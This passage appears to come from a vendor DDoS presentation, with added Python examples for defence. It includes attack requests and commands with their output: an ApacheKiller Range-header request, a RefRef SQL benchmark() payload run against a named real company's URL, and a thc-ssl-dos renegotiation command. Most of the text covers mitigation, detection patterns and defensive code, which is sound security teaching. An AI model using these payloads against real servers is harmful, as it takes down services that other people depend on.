    RefRef: RefRef is the new Anonymous tool that replaces LOIC. The attack exploits a vulnerability in servers that use a database and GET variables. Flood attack that sends: select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f

  • Exhaustion of Memory Attacks: ApacheKiller

    HEAD / HTTP/1.1
    Host: 208.109.47.175
    Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12, ... ,5-1298,5-1299
    Accept-Encoding: gzip
    Connection: close

    (The Range header continues in the same pattern all the way to 5-1299: 1,300 overlapping byte ranges in a single request.)
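The request above is a single HEAD with a 1,300-part Range header; the memory goes into building one response part per range, and the parts overlap almost entirely. The server-side answer, which is the approach the Apache fix took, is to stop honouring the header when it is abusive: too many ranges, or ranges that overlap, and the server simply serves the whole resource with a normal 200. The following is an added example (not code from the original slides or from Apache) that parses `Range: bytes=...` and applies that policy; the 200-range ceiling and the sample headers are assumptions.

```python
# Added example, not from the original slides: validate a Range header before
# honouring it. Too many parts, or overlapping parts, and the header is ignored
# (full 200 response) instead of building one in-memory part per range.
# MAX_RANGES and the sample headers below are assumptions made for the example.
MAX_RANGES = 200


def parse_byte_ranges(header_value, size):
    """Parse 'bytes=a-b,c-,-n' into absolute (start, end) pairs for a resource of
    `size` bytes. Unsatisfiable parts are dropped; returns None if the syntax is unusable."""
    if not header_value.startswith("bytes="):
        return None
    ranges = []
    for spec in header_value[len("bytes="):].split(","):
        first, sep, last = spec.strip().partition("-")
        if not sep:
            return None
        try:
            if first == "" and last != "":          # suffix range: the last n bytes
                n = int(last)
                if n == 0:
                    continue
                start, end = max(size - n, 0), size - 1
            elif first != "":
                start = int(first)
                end = int(last) if last != "" else size - 1
            else:
                return None
        except ValueError:
            return None
        if start >= size or start > end:
            continue                                 # e.g. "5-0": cannot be satisfied
        ranges.append((start, min(end, size - 1)))
    return ranges


def merge(ranges):
    """Coalesce overlapping or adjacent ranges; fewer parts out than in means overlap."""
    merged = []
    for start, end in sorted(ranges):
        if merged and start <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    return merged


def decide(header_value, size, max_ranges=MAX_RANGES):
    """('partial', ranges) to answer 206 with those parts; ('full', []) to ignore the
    header and answer 200; ('invalid', []) for a malformed header (also served full)."""
    ranges = parse_byte_ranges(header_value, size)
    if ranges is None:
        return ("invalid", [])
    if len(ranges) > max_ranges:
        return ("full", [])
    merged = merge(ranges)
    if len(merged) < len(ranges):                    # overlap: refuse to multiply work
        return ("full", [])
    return ("partial", merged)


# Constructed samples: the ApacheKiller pattern "0-,5-0,...,5-1299" beside an ordinary
# two-part request of the kind a download manager sends.
APACHEKILLER_RANGE = "bytes=0-," + ",".join(f"5-{i}" for i in range(1300))
NORMAL_RANGE = "bytes=0-499,1000-1499"

if __name__ == "__main__":
    print(decide(APACHEKILLER_RANGE, size=10_000))
    print(decide(NORMAL_RANGE, size=10_000))
```

Two design choices are deliberate: the count check runs before the merge so the server never does O(n) work on a header it will reject anyway, and overlap downgrades to a full response rather than a 416, because a legitimate client that sent overlapping parts still gets its data.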

  • Exhaustion of Memory Attacks: RefRef

    GET /viewNews.php?id=53%20and%20(select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)) HTTP/1.1
    TE: deflate,gzip;q=0.3
    Connection: TE, close
    Host: www.eudragene.local
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

    perl refref.pl http://www.telefonica.com/viewNews.php?id=53
    == #RefRef http://hackingalert.blogspot.com ==
    [+] Target: http://www.telefonica.com/viewNews.php?id=53
    [+] Starting the attack
    [+] Info: control+c for stop attack
    [+] Web Off
    == RefRef http://hackingalert.blogspot.com ==
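RefRef only works where the `id` GET variable is pasted straight into SQL, so the fix is the ordinary SQL-injection fix. The following is an added example (not code from the original slides or from the RefRef tool) that puts the vulnerable construction next to the parameterised one using Python's standard sqlite3 module and a constructed `news` table, plus the request-line check a WAF or log rule would use. SQLite has no `benchmark()` function, so the vulnerable path fails with an SQL error here rather than burning CPU, but the contrast is the same: the payload reaches the database as code in one case and as an ordinary value in the other.

```python
# Added example, not from the original slides: vulnerable concatenation beside the
# parameterised query, on an in-memory sqlite3 table constructed for the example.
import sqlite3

# The RefRef payload as it arrives after URL decoding (taken from the request above).
PAYLOAD = "53 and (select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))"


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (53, 'sample headline')")   # constructed row
    return db


def view_news_vulnerable(db, id_param):
    """String concatenation: whatever the client sent becomes part of the statement.
    Returns (sql, rows) or (sql, 'error: ...') so the effect is visible either way."""
    sql = "SELECT title FROM news WHERE id=" + id_param
    try:
        return sql, [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        return sql, f"error: {exc}"


def view_news_parameterised(db, id_param):
    """Placeholder binding: the value travels separately from the statement, so an
    expression inside it is compared as data and never executed."""
    return [row[0] for row in db.execute("SELECT title FROM news WHERE id=?", (id_param,))]


def looks_like_refref(query_string):
    """Detection side: the RefRef signature in a request line is a CPU-burning
    function call inside a GET parameter; cheap to match in a proxy or access log."""
    lowered = query_string.lower()
    return "benchmark(" in lowered and "select" in lowered


if __name__ == "__main__":
    print(view_news_vulnerable(fresh_db(), PAYLOAD))
    print(view_news_parameterised(fresh_db(), PAYLOAD))
    print(looks_like_refref("id=53%20and%20(select+benchmark(99999999999,0x70))"))
```

With a real MySQL backend the vulnerable path would execute `benchmark()` and hold a worker busy for the duration, which is the whole attack; the parameterised path returns no rows and costs nothing. The signature check is a stopgap for the period before the application is fixed.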

  • Exhaustion of CPU

    The easy way to overwhelm a server is by attacking an HTTPS server, since the SSL handshake uses a lot of CPU due to encryption.

    Many DDoS tools and botnets are able to perform HTTPS attacks.

    Network-based solutions can stop HTTPS attacks based on protocol or resource exhaustion.

    Low & Slow attacks against HTTPS servers must be stopped by decrypting the traffic.

    Enterprises manage their own SSL certificates and will not let the ISP open those tunnels.

    The only way to stop these attacks is to decrypt, analyse and re-encrypt these connections.

    The latest versions of Slowloris and Siege already support HTTPS. In 2012 we saw the first botnet that supports it too.

  • Exhaustion of CPU: Two Handshakes

    [Diagram: TCP handshake followed by SSL handshake]

  • Exhaustion of CPU: HTTPS renegotiation

    thc-ssl-dos -l 1 192.168.127.1 8443 --accept

    [THC ASCII-art banner]
    http://www.thc.org
    Twitter @hackerschoice
    Greetingz: the french underground
    Waiting for script kiddies to piss off................
    The force is with those who read the source...
    Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
    Handshakes 128 [136.44 h/s], 1 Conn, 0 Err
    Handshakes 260 [132.65 h/s], 1 Conn, 0 Err
    Handshakes 400 [136.49 h/s], 1 Conn, 0 Err
    Handshakes 550 [145.47 h/s], 1 Conn, 0 Err
    Handshakes 694 [152.00 h/s], 1 Conn, 0 Err
    Handshakes 834 [140.42 h/s], 1 Conn, 0 Err
    Handshakes 973 [139.26 h/s], 1 Conn, 0 Err

  • Agenda

    Smart. Secure. Available.

    What is DDoS?

    Attack Techniques

    Defense Techniques: How can I protect clients connected to my network? ISP DDoS solution deployment: how does it work? Defense in layers.

    War Games

  • Stopping Attacks in the Right Place

  • Arbor's Key Technologies

    Visibility

    Flow Intelligence: Arbor's products are the premier analyzers of full network flow data, providing holistic traffic & security visibility.

    Application Intelligence: Arbor's products offer deep insight into applications and services as more services move to standard ports.

    Global Intelligence: Arbor's products leverage the real-time Internet-wide visibility of the ATLAS initiative to detect and stop active threats.

    Protection

    Availability Engine: Arbor's core packet analysis & blocking engine can stop, and is also immune to, all threats against availability.

    Botnets & Malware: Arbor's Security & Emergency Response Team (ASERT) conducts unique research into botnets and malware.

    Cloud Signaling: Arbor's proprietary protocol enables signaling from the enterprise edge to the cloud for complete protection.

  • Peakflow Products

    Visibility: Peakflow SP

    Models: CP-6000, PI-6000, BI-6000, FS-6000

    The Peakflow Service Provider (SP) solution collects and analyzes Flow, BGP, and SNMP data; conducts network anomaly detection for security visibility; provides a user interface for managed services; and scales massively to meet the needs of the world's largest service providers and cloud operators.

    Protection: Peakflow TMS

    Models: TMS-2300 & TMS-4000 Series

    The Peakflow Threat Management System (TMS) is built for high-performance, carrier-class networks and is used for surgical mitigation of DDoS attack traffic with no additional latency for legitimate traffic; it also serves as the protection platform for in-cloud managed security services.

  • Pravail Products

    Visibility: Pravail NSI

    Models: Collectors 5003, 5004, 5005, 5006, 5007; Controllers 5110, 5120, 5130, 5220, 5230

    The Pravail Network Security Intelligence (NSI) solution (formerly known as Peakflow X) collects and analyzes Flow and raw packet data; performs behavioral anomaly detection; and provides application-level and pervasive security intelligence across the enterprise network.

    Protection: Pravail APS

    Models: APS 2202, APS-2203, APS 2004, APS-2104, APS-2105, APS-2107, APS-2108

    The Pravail Availability Protection System (APS) provides out-of-the-box protection against attacks while being immune to state-exhausting attacks; blocks complex application-layer DDoS; uses a dynamic threat feed from ATLAS to stop botnets; supports inline deployment models; and can send cloud signals upstream.

  • The ATLAS Initiative

    The ATLAS initiative is the world's most comprehensive Internet monitoring & security intelligence system.

    Services: ATLAS Intelligence Feed (AIF), Active Threat Feed (ATF), Fingerprint Sharing, Global Threat Analysis Portal

    ATLAS intelligence is seamlessly integrated into Arbor's products and services, including real-time services, global threat intelligence, and insight into key Internet trends.

    ASERT, Arbor's Security Engineering and Research Team, also leverages ATLAS to provide expert commentary on security trends and to address the significant Internet research questions.

    Active Threat Feed (ATF)

  • ASERT Threat Detection/Classification

    Sources: honeypots & SPAM traps, ATLAS, the security community; over 2 dozen malware sources; 20-50K malware samples/day; 2.2M+ samples in total.

    A sandbox of virtual machines runs the malware (looking for botnet C&C, files, network behavior).

    DDoS family: fingerprint; report and PCAP stored in database.

    Tracker: DDoS attack auto-classification and analysis every 24 hrs.

  • Peakflow SP / TMS - Solution Overview

    [Diagram: cloud Providers A, B and C at the peering edge; CP and TMS deployed in the provider network, with Pravail APS as the on-site equivalent; visibility, detection and mitigation network-wide]

    A Central Console for Visibility & Security

    Peakflow SP CP: the Collector Platform (CP) collects and analyzes IP Flow, BGP, and SNMP data; conducts network anomaly detection; provides traffic & service reporting; provides the user interface; and manages other SP devices (i.e. TMS).

    Peakflow SP TMS: the Threat Management System (TMS) is built for carrier-class networks and used for surgical mitigation of attack traffic; conducts service performance monitoring; and serves as the platform for in-cloud managed security services.

  • DDoS - Mitigation

    [Diagram: CP and TMS in the provider network, built up step by step across the following slides]

    1. Detect (network wide: CP using Flow)

    2. Activate TMS (manual or automatic)

    3. Divert traffic (network wide: BGP off-ramp announcement)

    4. Clean the traffic and forward the legitimate part (network wide: using an on-ramp technique [e.g. MPLS, GRE, VLAN, ...])

    5. Protected
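    The five steps above, as an added example that is not Arbor's code: a toy collector aggregates constructed flow records per destination over fixed windows, compares each destination against its own baseline window, reports the dominant protocol/port mix of an anomaly (which decides the countermeasure), and then produces the off-ramp announcement (the victim as a more-specific prefix) together with the name of the on-ramp tunnel that carries the cleaned traffic back. The record format, all addresses, the thresholds and the "SCRUBBER" next hop are assumptions.

```python
"""Network-wide DDoS detection on flow records and the diversion decision.

Added example, not Arbor's code: a toy version of what the slides describe
for the collector (detect network wide using Flow), followed by the
off-ramp/on-ramp decision.  Record format, addresses and thresholds are
constructed for this example.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed flow records: (window, src, dst, proto, dst_port, bytes, packets)
FLOWS = [
    (0, "198.51.100.5", "203.0.113.10", "tcp", 443, 120_000, 150),
    (0, "198.51.100.6", "203.0.113.10", "tcp", 443, 95_000, 120),
    (0, "198.51.100.7", "203.0.113.20", "udp", 53, 30_000, 300),
    (1, "198.51.100.5", "203.0.113.10", "tcp", 443, 110_000, 140),
    (1, "192.0.2.40", "203.0.113.10", "udp", 53, 9_000_000, 90_000),
    (1, "192.0.2.41", "203.0.113.10", "udp", 53, 8_500_000, 85_000),
    (1, "198.51.100.7", "203.0.113.20", "udp", 53, 32_000, 320),
]


def per_window_totals(flows):
    """Sum bytes per (window, dst) and keep the protocol/port mix per key."""
    totals = defaultdict(int)
    mix = defaultdict(lambda: defaultdict(int))
    for window, _src, dst, proto, port, nbytes, _pkts in flows:
        totals[(window, dst)] += nbytes
        mix[(window, dst)][(proto, port)] += nbytes
    return totals, mix


def detect(flows, baseline_window, window, factor=5, min_bytes=1_000_000):
    """Step 1: flag destinations whose bytes in `window` exceed `factor` times
    their bytes in `baseline_window` and an absolute floor (both assumptions).
    Returns {dst: {bytes, baseline, top (proto, port), share}}."""
    totals, mix = per_window_totals(flows)
    alerts = {}
    for (w, dst), nbytes in totals.items():
        if w != window:
            continue
        base = totals.get((baseline_window, dst), 0)
        if nbytes >= min_bytes and nbytes > factor * max(base, 1):
            top_key, top_bytes = max(mix[(w, dst)].items(), key=lambda kv: kv[1])
            alerts[dst] = {"bytes": nbytes, "baseline": base,
                           "top": top_key, "share": round(top_bytes / nbytes, 2)}
    return alerts


def diversion_plan(dst, onramp="gre-to-customer-edge"):
    """Steps 2-4: the off-ramp announces the victim as a more-specific prefix
    (a host route) so the network routes it to the scrubbing device; the
    on-ramp names the tunnel (MPLS, GRE, VLAN on the slides) that returns the
    cleaned traffic.  "SCRUBBER" is a placeholder next hop."""
    host = ip_address(dst)
    prefix = ip_network(f"{host}/{host.max_prefixlen}")
    return {"announce": str(prefix), "next_hop": "SCRUBBER", "onramp": onramp}


if __name__ == "__main__":
    for dst, info in detect(FLOWS, baseline_window=0, window=1).items():
        print(dst, info, diversion_plan(dst))
```

    In the constructed data the only destination over threshold is 203.0.113.10, and 99% of its bytes are UDP/53, which tells the operator before the TMS is activated that DNS countermeasures, not HTTP ones, are the right layer to arm.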

  • Specialized Multi-Layer Countermeasures to Block Complex DDoS Attacks

    Each source is evaluated by the multi-layer countermeasures, in this order:

    Stateless Static & Dynamic Packet Preventions

    Invalid Packets & Behavioral Preventions

    Malformed & Client Challenge Response Preventions

    HTTP(s), DNS, SIP Application Layer & Behavioral Preventions

    Dynamic Attack Preventions (e.g. AIF Signatures)

    Attack classes addressed: Flooding Attacks; Protocol Attacks; Session Attacks; Application, Slow & Low Attacks; Dynamic Botnet & Tool Attacks.

  • DDoS Multi-Layer-Countermeasure (Overview)

    Zombie Detection; Invalid Packets; SYN Flood Prevention; Flexible Rate-based Blocking; IP Location Blocking; IP Location Policing; TCP Connection Verification; IP Black/White Listing; SYN Authentication; Fragmentation Prevention; Large IP/FCAP & DNS & HTTP Filter Lists; Payload Filter; ATLAS Intelligence Feed (AIF) Prevention; SSL/TLS Protocol Multi-Attack Prevention; URL Blocking; HTTP Malformed Prevention; HTTP Authentication; HTTP Flood Prevention; HTTP Basic Botnet Prevention; HTTP Regular Expression Filter; DNS Authentication; DNS Request Limiting; DNS NXDOMAIN Rate Limiting; DNS Malformed Prevention; DNS Domain Blacklisting; DNS Regular Expression Filter; Multiple SIP Preventions; ICMP Flood Prevention; Traffic Shaping; + many others ... growing.

  • Multilayer Protection / Countermeasures by groups

    Filter List: PCAPs, Static Blacklist, Static Whitelist, Dynamic Blacklist, Countries, Multicast, Private Address

    Challengers: TCP Authentication, DNS Authentication, HTTP Authentication

    Traffic Limiting/Shaping: Rate-based TCP Connection, DNS Rate, DNS NXDomain Rate, HTTP Rate, ICMP Rate, UDP Rate, TCP Connections Reset

    Heuristics: Web Crawler Support, CDN and Proxy Support, TLS Attacks, TCP SYN Flood, Fragment Detection, Application Misbehavior

    Signatures: Regular Expressions, DNS Regular Expressions, HTTP Regular Expressions, Botnet Prevention

  • Cloud (Peakflow) mitigation / On-site (Pravail) mitigation

    Op Ababil (Al Qaeda): attack on US banks

    ~67 Gbps attack traffic

    ~14 Gbps leaked traffic

  • Multi-Vector HTTP Attack on a Large Bank

    HTTP Regular Expression: ^Accept-Language: ru$

    Standard countermeasures not working

    Low & Slow countermeasures: SlowLoris
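    An added example (not Arbor's code) that ties the countermeasure groups of the earlier slides to the bank case just described: every request source is run through the groups in the slides' order, here a filter list (static blacklist, private/multicast source addresses), a per-source HTTP rate limit, and a signature layer whose first pattern is the slides' own `^Accept-Language: ru$`. The challenge and heuristic groups need an interactive exchange with the client and are only marked in place. The request log, the addresses, the blacklist entry and the rate threshold are constructed for the example.

```python
"""Evaluate every HTTP request source through ordered countermeasure layers.

Added example, not Arbor's code: a toy model of the slides' groups (filter
list, traffic limiting, signatures).  Request log entries, addresses and
thresholds are constructed; the first signature is the regular expression
the slides report from the large-bank case.
"""
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

# Filter-list layer (constructed entries).  Documentation ranges are used for
# the sample sources, so bogons are matched explicitly rather than via
# ipaddress.is_private, which also flags 192.0.2.0/24 and friends.
STATIC_BLACKLIST = {"192.0.2.66"}
BOGON_NETWORKS = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # private address
    "127.0.0.0/8", "0.0.0.0/8", "224.0.0.0/4")]       # loopback, this-net, multicast
# Traffic-limiting layer: HTTP requests allowed per source per second (assumption).
HTTP_RATE_LIMIT = 20
# Signature layer: regular expressions applied to the raw request headers.
HEADER_SIGNATURES = {
    "accept-language-ru": re.compile(r"^Accept-Language: ru$", re.M),
    "empty-user-agent": re.compile(r"^User-Agent:\s*$", re.M),
}

NORMAL_HEADERS = "Host: bank.example\nUser-Agent: Mozilla/5.0\nAccept-Language: en-US,en;q=0.9\n"
ATTACK_HEADERS = "Host: bank.example\nUser-Agent: Mozilla/5.0\nAccept-Language: ru\n"

# Constructed request log: (second, source, headers)
REQUESTS = (
    [(0, "198.51.100.7", NORMAL_HEADERS)] * 3
    + [(0, "192.0.2.41", NORMAL_HEADERS)] * 25   # flood with benign-looking headers
    + [(0, "192.0.2.40", ATTACK_HEADERS)] * 2    # matches the bank-case signature
    + [(0, "192.0.2.66", NORMAL_HEADERS)]        # on the static blacklist
    + [(0, "10.0.0.5", NORMAL_HEADERS)]          # private source seen at the Internet edge
)


def filter_list(src):
    """Group 1: static blacklist, then invalid (bogon) source addresses."""
    if src in STATIC_BLACKLIST:
        return "static-blacklist"
    ip = ip_address(src)
    if any(ip in net for net in BOGON_NETWORKS):
        return "invalid-source"
    return None


class RateLimiter:
    """Group 3: fixed one-second window request limit per source."""

    def __init__(self, limit):
        self.limit = limit
        self.counts = defaultdict(int)

    def exceeded(self, src, second):
        self.counts[(src, second)] += 1
        return self.counts[(src, second)] > self.limit


def signature(headers):
    """Group 5: name of the first matching header signature, if any."""
    for name, pattern in HEADER_SIGNATURES.items():
        if pattern.search(headers):
            return f"signature:{name}"
    return None


def evaluate(requests, rate_limit=HTTP_RATE_LIMIT):
    """Run each request through the groups in order; return [(src, verdict)]."""
    limiter = RateLimiter(rate_limit)
    verdicts = []
    for second, src, headers in requests:
        verdict = filter_list(src)
        # Group 2 (challengers: TCP/DNS/HTTP authentication) would sit here.
        if verdict is None and limiter.exceeded(src, second):
            verdict = "rate-limit"
        # Group 4 (heuristics: crawler/CDN awareness, misbehavior) would sit here.
        if verdict is None:
            verdict = signature(headers)
        verdicts.append((src, verdict or "pass"))
    return verdicts


def summarize(requests):
    """Count verdicts: the per-layer view an operator watches during an attack."""
    return Counter(verdict for _src, verdict in evaluate(requests))
```

    The order matters in the way the slides describe: cheap stateless checks first, so a blacklisted or bogon source never consumes a rate-limit slot or a regex evaluation, and the signature layer only sees what the earlier groups let through.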

  • Attack on a Large Carrier

    8 Gbps stopped by IP filter list.

    1 Mpps of malformed DNS traffic.

    Real-time packet capture
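    For the malformed-DNS part of this case, an added example that is not Arbor's code: a validator for the DNS header and question section (RFC 1035 wire format) of the kind a "DNS malformed prevention" countermeasure applies to each query before it is allowed through, with a batch counter over constructed sample packets covering one defect class each. The packets and the transaction id are constructed.

```python
"""Classify DNS query packets as well-formed or malformed.

Added example, not Arbor's code: a minimal validator of the DNS header and
question section (RFC 1035 wire format).  The sample packets are constructed.
"""
import struct
from collections import Counter

MAX_LABEL = 63
MAX_NAME = 255


def validate_dns_query(pkt):
    """Return None for a well-formed single-question query, else the defect."""
    if len(pkt) < 12:
        return "short-header"
    _txid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000:
        return "qr-bit-set"            # a response, not a query
    if qdcount != 1:
        return f"qdcount={qdcount}"    # clients and resolvers send exactly one question
    if ancount or nscount:
        return "records-in-query"
    off, name_len = 12, 0
    while True:
        if off >= len(pkt):
            return "truncated-name"    # ran out of bytes before the root label
        length = pkt[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0:
            return "compression-in-question"  # pointers are not valid here
        if length > MAX_LABEL:
            return "label-too-long"
        off += 1 + length
        name_len += 1 + length
        if name_len > MAX_NAME:
            return "name-too-long"
    if len(pkt) - off < 4:
        return "truncated-question"
    _qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    if qclass not in (1, 255):         # IN or ANY
        return f"qclass={qclass}"
    if arcount == 0 and len(pkt) != off + 4:
        return "trailing-bytes"        # nothing may follow the question without an OPT record
    return None


def build_query(name, txid=0x1234, qtype=1, qdcount=1, flags=0x0100):
    """Build a query the straightforward way; used only to construct samples."""
    wire = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, flags, qdcount, 0, 0, 0) + wire + struct.pack("!HH", qtype, 1)


VALID = build_query("example.com")
# Constructed samples: one well-formed query and one packet per defect class.
SAMPLES = [
    VALID,
    VALID[:20],                                   # name cut off mid-way
    build_query("example.com", qdcount=0),        # header claims no question
    build_query("example.com", flags=0x8180),     # response bit set
    VALID[:12] + b"\xc0\x0c" + VALID[-4:],        # compression pointer in question
    VALID + b"\x00\x00",                          # garbage after the question
]


def count_defects(pkts):
    """Tally defects across a batch, the counter a malformed-DNS filter would export."""
    return Counter(validate_dns_query(p) or "ok" for p in pkts)


if __name__ == "__main__":
    print(count_defects(SAMPLES))
```

    At 1 Mpps this check is cheap enough to run per packet because it never allocates or recurses: it walks the question once with explicit bounds checks, which is also what keeps the validator itself from being the thing that falls over under a flood of truncated names.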

  • Agenda

    What is DDoS? / Attack Techniques / Defense Techniques / War Games

  • Thank You